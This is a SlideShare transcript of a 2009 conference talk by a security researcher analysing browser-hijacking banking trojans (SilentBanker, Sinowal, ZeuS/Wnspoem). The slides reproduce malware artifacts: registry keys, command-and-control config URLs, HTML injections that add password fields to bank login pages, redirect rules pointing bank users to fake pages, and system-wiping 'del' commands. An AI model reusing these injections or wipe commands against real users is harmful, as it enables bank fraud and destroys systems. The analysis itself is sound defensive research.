*[ Common Browser Hijacking Methods]David BarrosoTERENA Meeting, León
Agenda              Browser Hijacking   Examples: SilentBanker, Sinowal, Wnspoem           Kill the Operating System      ...
BrowserHijacking
Definition  “Browser hijacking is the modification of a web  browser’s settings by malicious code. The term  ‘hijacking’ i...
Why are they asking for so many data?                         5
Examples
SilentBanker  Date: 2007  Method: Browser Helper Object  Technique: Real time HTML injection and HTML forwarding  Infectio...
SilentBanker: Flow Diagram                        8
SilentBanker: BHO Installation[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}]@="Microsoft Shared Library Ob...
SilentBanker: Configuration FileGet X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=...
SilentBanker: Configuration File      The encrypted configuration file includes:[dfgdf] • Additional configuration sources...
SilentBanker: Injection ConfigurationGet X.Y.67.30/~ipcount/ww6/getcfg.php? Action                                 pokid=9...
SilentBanker: Injection Configuration <ge inyvta!"gbc">  <gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq>  <gq j...
SilentBanker: Original Webpage                        14
SilentBanker: Modified Webpage                       15
Sinowal/Anserin/Torpig  Date: 2005  Method: Code Injection  Technique: Real time HTML injection and HTML forwarding  Infec...
Sinowal: Injection  Sinowal does not have a configuration file with details about all the injections  Each time the user c...
Sinowal: Injection ExampleGET host/Key/EncryptedDataGET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1            ...
Sinowal: Injection ExampleStep 3: The injection server looks for the targeted brand:UK online*.lloydstsb.* /miheld.ibc {ww...
Sinowal: Injection Example                                               2: You need a GET of to enabled                  ...
Sinowal: Targeted URLs  HTTP Forwarding             •   PL: 7  (Web Injects)               •   AU: 26  •   UK: 40         ...
Wnspoem/PRG/ZeuS/Ntos   Date: 2006   Method: Code Injection   Technique: Real time HTML injection and HTML forwarding   In...
Wnspoem: Famous Screenshots                     23
Wnspoem: Flow Diagram                        24
Wnspoem: Hooks Wsock32.dll (FTP/POP3 capture)        Wininet.dll (Capture data, inject  •   Send                          ...
Wnspoem: Configuration FileConfiguration files in latest wnspoem version uses RC4 and 256-bits keysset_url https://www.gru...
Wnspoem: Original Webpage                      27
Wnspoem: Modified Webpage                     28
Wnspoem: HTTP Forwarding Some banks use security tokens or more complex 2nd authentication than a password In this scenari...
Wnspoem: HTTP ForwardingIn the configuration file:@https://*.barclays.co.uk/*https://*.barclays.co.uk/*http://compromisedh...
Wnspoem: Fake Webpage                    31
Wnspoem: Statistics  Analysis and Statistics: Configuration files  750 configuration files (usually cfg.bin) analyzed.  On...
Wnspoem: Top 10 TLD                      33
Wnspoem: Targeted Brands                      34
Wnspoem: Malicious Domains                      35
Wnspoem: Malicious IP Addresses                       36
Kill theOperatingSystem
Kill the Operating System  It is getting more common that just after stealing the credentials, the operating  system is re...
Kill the Operating System  Nethell:   • Deletes NTDETECT.COM and ntldr  InfoStealer:   • Deletes drivers*.sys   • Deletes ...
Summary
Summary Browser Hijacking is actively used in fraud schemes Targeted brands are all around the world Currently, only Micro...
ThanksDavid BarrosoS21sec e-crime Directordbarroso@s21sec.comhttp://blog.s21sec.com       lostinsecurity
*[ MUCHAS GRACIAS ]           Pág. 43
Upcoming SlideShare
Loading in …5
×

Common Browser Hijacking Methods

3,351 views

Published on

Presentación realizada en el evento de Terena de mayo de 2009

Published in: Technology
0 Comments
1 Like
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
3,351
On SlideShare
0
From Embeds
0
Number of Embeds
1,016
Actions
Shares
0
Downloads
0
Comments
0
Likes
1
Embeds 0
No embeds

No notes for slide

Common Browser Hijacking Methods

  1. 1. *[ Common Browser Hijacking Methods]David BarrosoTERENA Meeting, León
  2. 2. Agenda Browser Hijacking Examples: SilentBanker, Sinowal, Wnspoem Kill the Operating System Summary 2
  3. 3. BrowserHijacking
  4. 4. Definition “Browser hijacking is the modification of a web browser’s settings by malicious code. The term ‘hijacking’ is used as the changes are performed without the user’s permission” (Wikipedia) Additionally, the malicious code can modify the HTML rendered in the browser in order to lure the user 4
  5. 5. Why are they asking for so many data? 5
  6. 6. Examples
  7. 7. SilentBanker Date: 2007 Method: Browser Helper Object Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits Misc: more than 75 mutations 7
  8. 8. SilentBanker: Flow Diagram 8
  9. 9. SilentBanker: BHO Installation[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}]@="Microsoft Shared Library Object Version"[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}InprocServer32]@="C:WINDOWSsystem32mfc42dx1.dll""ThreadingModel"="Apartment"[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}ProgID]@="SharedObject.SharedObjectVersion.1"[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}TypeLib]@="{5F226421-415D-408D-9A09-0DCD94E25B48}"[HKEY_CLASSES_ROOTCLSID{0000AC13-3487-1583-C4BE-BE6A839DB000}VersionIndependentProgID]@="SharedObject.SharedObjectVersion"[HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionExplorerBrowser Helper Objects{0000AC13-3487-1583-C4BE-BE6A839DB000}] 9
  10. 10. SilentBanker: Configuration FileGet X.Y.67.30/~ipcount/ww6/getcfg.php?id=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=10&v=21&b=6&z=12705442 10
  11. 11. SilentBanker: Configuration File The encrypted configuration file includes:[dfgdf] • Additional configuration sourcesBg1=X.Y.67.30/~ipcount/ww6/getcfg.php • Dropsite URLBg2=A.B.100.103/ww6/getcfg.php • Update URL • Data encryption key[nbmx]Bg1=X.Y.67.30/~ipcount/ww6/data.phpBg2=A.B.100.103/ww6/data.php[kjew]Bg1=X.Y.67.30/~ipcount/ww6/file.exeBg2=A.B.100.103/ww6/file.exe[sdfs]secd=08000000B7B613F1F56F5BC7EDAEDEEFD2ABB1D38B2BA1014A585… 11
  12. 12. SilentBanker: Injection ConfigurationGet X.Y.67.30/~ipcount/ww6/getcfg.php? Action pokid=93D6890E-DC16-4CB7-ABCB-829EB06B1CD7&c=20&v=21&b=6&z=12705442 qas Target URL njd Begin replacement token dfr Number of characters in njd -1 xzn End replacement token [jhw18] xzq Number of characters in xzn -1 pok=insert rek HTML code injected qas=passport.yandex.ru/passport req Number of characters in rek -1 njd=3ECFE0F0EEEBFC3A3C28dfr=9 insert insert injected HTML code between tokensxzn=3C2367653E69 delete delete HTML code in xznxzq=5 replace replace HTML code in xznrek=202020203C676520696E797674612122676263223E0D0A202020203223ECFE subreq substitute xzn with rekBE0F2E5E6EDFBE920EFE0F0EEEBFC3A3C2367713E0D0A202020203C6771206 grab extract field in xznA767167752122292431222070796E666621227661636867223E0D0A202020203C766163686720676C63722122636E66666A6265712220616E7A722122636E66666…req=331 12
  13. 13. SilentBanker: Injection Configuration <ge inyvta!"gbc"> <gq jvqgu!".1"><qvi fglyr!"jvqgu: ($ck;"><oe #><#qvi><#gq> <gq jvqgu!"%+1" pynff!"ynory">Ïëàòåæíûé ïàðîëü:<#gq> <gq jvqgu!")$1" pynff!"vachg"> <vachg glcr!"cnffjbeq" anzr!"cnffjq&" inyhr!"" fglyr!"jvqgu:)$1"gnovaqrk!"&">2aofc;2aofc;<oe#> <#gq> <gq jvqgu!"&)1"><oe><#gq> <#ge> ROT-13 Algorithm<tr valign="top"> <td width="8%"><div style="width: 40px;"><br /></div></td> <td width="17%" class="label">Ïëàòåæíûé ïàðîëü:</td> <td width="50%" class="input"> <input type="password" name="passwd2" value="" style="width:50%" tabindex="2&nbsp;&nbsp;<br/> </td> <td width="25%"><br></td> </tr> 13
  14. 14. SilentBanker: Original Webpage 14
  15. 15. SilentBanker: Modified Webpage 15
  16. 16. Sinowal/Anserin/Torpig Date: 2005 Method: Code Injection Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits and email Misc: infects Master Boot Record (MBR) to be stealth 16
  17. 17. Sinowal: Injection Sinowal does not have a configuration file with details about all the injections Each time the user connects to a specific sites, Sinowal asks its injection server for instructions 17
  18. 18. Sinowal: Injection ExampleGET host/Key/EncryptedDataGET host/EFAAC5AEB85FF1D1/MGJmlWUXX1Rkf8V+6n7wFFFiJsXRwhy1 I want the answer Tell me the fake This is the targeted encrypted page path brand 18
  19. 19. Sinowal: Injection ExampleStep 3: The injection server looks for the targeted brand:UK online*.lloydstsb.* /miheld.ibc {www} /uk/lloyds/lloyds.php 204USA onlineid.bankofamerica.com /cgi- bin/sso.login.controller* {www} /usa/bofa_pers/sso.login.php 2 0 3ES www*.bancopopular.es /Bpemotor {www} /spain/bancopopular/bancopopular.php 2 0 2 19
  20. 20. Sinowal: Injection Example 2: You need a GET of to enabled 5: number 0: Number1: Injection of visits This is the fake page injection attempts the real URLStep 4: the injection server answers pathwww*.bancopopular.es /Bpemotor/spain/bancopopular/bancopopular.php 2 0 5 1 20
  21. 21. Sinowal: Targeted URLs HTTP Forwarding • PL: 7 (Web Injects) • AU: 26 • UK: 40 • SK: 5 • DE: 47 • NZ: 8 • US: 65 • NL: 4 • ES: 30 • SG: 2 • IT: 18 • AT: 7 • TR: 44 21
  22. 22. Wnspoem/PRG/ZeuS/Ntos Date: 2006 Method: Code Injection Technique: Real time HTML injection and HTML forwarding Infection: drive-by exploits Version 1 Version 2 Version 3 Version 4Directory wnspoem sysproc64 twain_32 lowsecFilename ntos.exe oembios.exe twext.exe sdra64.exeStolen data audio.dll sysproc86.sys local.ds local.dsConfiguratio video.dll sysproc32.sys user.ds user.dsn 22
  23. 23. Wnspoem: Famous Screenshots 23
  24. 24. Wnspoem: Flow Diagram 24
  25. 25. Wnspoem: Hooks Wsock32.dll (FTP/POP3 capture) Wininet.dll (Capture data, inject • Send HTML) • Sendto • HTTPSendRequest • Closesocket • InternetReadFile Ws2_32.dll (FTP/POP3) • InternetReadFileEx • Send • InternetQueryDataAvailable • Sendto • InternetCloseHandle • WSASend • HTTPQueryInfo • WSASendTo Ntdll.dll (Infect processes and hide • Closesocket files) User32.dll (Keylogger) • NtCreateThread • GetMessage • LdrLoadDll • PeekMesasge • LdrGetProcedureAddress • GetClipboardData • NtQueryDirectoryFile Crypt32.dll (Certificates) • PFXImportCertStore 25
  26. 26. Wnspoem: Configuration FileConfiguration files in latest wnspoem version uses RC4 and 256-bits keysset_url https://www.gruposantander.es/bog/sbi*?ptns=acceso* GPdata_beforename="password"*</td>*</td>data_enddata_inject<td align="left" colspan="7" valign="bottom"></td></tr><tr><td class="textoHome" align="left">3. Clave de Transferencias</td><td width="20"><img src=/img4bog/px.gif border=0 width="20" height="1"></td><td align="left"><input type="password" name="ESpass" maxlength="60" tabindex="3" class="TextoContenido"></td>data_enddata_afterdata_end 26
  27. 27. Wnspoem: Original Webpage 27
  28. 28. Wnspoem: Modified Webpage 28
  29. 29. Wnspoem: HTTP Forwarding Some banks use security tokens or more complex 2nd authentication than a password In this scenario, HTML injection is avoided, and the user is forwarded to a fake webpage usually hosted in a compromised site 29
  30. 30. Wnspoem: HTTP ForwardingIn the configuration file:@https://*.barclays.co.uk/*https://*.barclays.co.uk/*http://compromisedhost.com/img/commons/barclay/index.ph p@https://*.cajasur.es/*https://*.cajasur.es/*http://compromisedhost.com/img/commons/cajasur/index.ph p 30
  31. 31. Wnspoem: Fake Webpage 31
  32. 32. Wnspoem: Statistics Analysis and Statistics: Configuration files 750 configuration files (usually cfg.bin) analyzed. Only wnspoem version 1, 2 and 3 32
  33. 33. Wnspoem: Top 10 TLD 33
  34. 34. Wnspoem: Targeted Brands 34
  35. 35. Wnspoem: Malicious Domains 35
  36. 36. Wnspoem: Malicious IP Addresses 36
  37. 37. Kill theOperatingSystem
  38. 38. Kill the Operating System It is getting more common that just after stealing the credentials, the operating system is remotely destroyed This action makes the analysis more difficult, since cannot be done remotely. The malicious code is not securely deleted in the system and can be recovered One optimistic result is that the machine will be reformated with a new and patched operating system. 38
  39. 39. Kill the Operating System Nethell: • Deletes NTDETECT.COM and ntldr InfoStealer: • Deletes drivers*.sys • Deletes some registry keys (HKLMMicrosoftWindows NTCurrentVersionWinlogon: Shell = Explorer.exe Wnspoem: • Deletes HKCU, HKLMSoftware and HKLMSystem Glacial Dracon: • del /A:S /Q /F C:*.* • del /S /Q %SYSTEMROOT% %PROGRAMFILES% 39
  40. 40. Summary
  41. 41. Summary Browser Hijacking is actively used in fraud schemes Targeted brands are all around the world Currently, only Microsoft Windows users are affected (Internet Explorer and Firefox) Be suspicious if your browser is asking for too much information Be more suspicious if your computer stops working just after your browsing is asking for too much information ☺ 41
  42. 42. ThanksDavid BarrosoS21sec e-crime Directordbarroso@s21sec.comhttp://blog.s21sec.com lostinsecurity
  43. 43. *[ MUCHAS GRACIAS ] Pág. 43

×